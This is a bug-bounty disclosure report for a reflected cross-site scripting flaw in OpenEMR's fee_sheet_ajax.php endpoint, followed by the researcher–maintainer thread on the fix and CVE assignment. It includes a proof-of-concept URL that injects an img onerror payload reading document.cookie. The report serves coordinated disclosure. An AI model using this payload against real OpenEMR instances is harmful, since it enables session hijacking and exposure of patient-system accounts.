We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross Site Scripting (reflected) on fee_sheet_ajax.php in openemr/openemr

Valid

Reported on

Aug 18th 2022

Description

When testing the app for XSS we found out that the fee_sheet_ajax.php endpoint is actually vulnerable to an XSS exploit.

PoC

  1. visit https://<openemr-instance>/interface/forms/fee_sheet/review/fee_sheet_ajax.php?task=retrieve&mode=encounters&prev_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E

OWASP Category

A03:2021-Injection

Remediation

Add text() to https://github.com/openemr/openemr/blob/master/interface/forms/fee_sheet/review/fee_sheet_ajax.php#L65

Impact

The impact of an exploited XSS vulnerability varies a lot. It ranges from Session Hijacking to the disclosure of sensitive data, CSRF attacks and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.

We are processing your report and will contact the openemr team within 24 hours. a year ago
Kusuman modified the report
a year ago
Kusuman modified the report
a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
stephen waite validated this vulnerability a year ago

Thanks for the report. A preliminary fix has been posted in this PR: https://github.com/openemr/openemr/pull/5695

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, then will be ok to make CVE # and make it public.

Thanks!

Kusuman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kusuman
a year ago

Researcher

Okay, thank you.

We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. a year ago
Brady Miller
a year ago

Maintainer

Updating that fix is in PR for rel-700 branch which will be in next 7.0.0 patch 2 (7.0.0.2): https://github.com/openemr/openemr/pull/5808 (after we bring this PR in, will then mark this item as fixed)

Brady Miller marked this as fixed in 7.0.0.2 with commit d5eb41 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
fee_sheet_ajax.php#L65 has been validated
Brady Miller
a year ago

Maintainer

Plan to "Publish" this about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks.

Brady Miller
a year ago

Maintainer

@admin , I made an error in the version that this will be fixed in. It should be 7.0.0.2 and not 7.0.2.

Ben Harvie
10 months ago

Admin

I have updated the fixed version to 7.0.0.2 as requested :)

Kusuman
10 months ago

Researcher

confirmed, it's no longer vulnerable, @admin can we assign a CVE to this vulnerability?

Brady Miller
10 months ago

Maintainer

hi @kusuman, we will likely be releasing the 7.0.0.2 patch this weekend. After we release the 7.0.0.2 patch, then we will "Publish" this vulnerability, which per my understanding will also then assign it a CVE.

Kusuman
10 months ago

Researcher

Got it, thanks.

Brady Miller published this vulnerability 9 months ago
Kusuman
9 months ago

Researcher

@admin can we assign a CVE to this vulnerability?

Brady Miller
9 months ago

Maintainer

@admin, when I published this, I did ensure the CVE toggle was on, but nothing populated/changed in the gui when I did that.

Pavlos
9 months ago

Admin

Sorry about that, we changed our UX. We'll make sure it gets a CVE

to join this conversation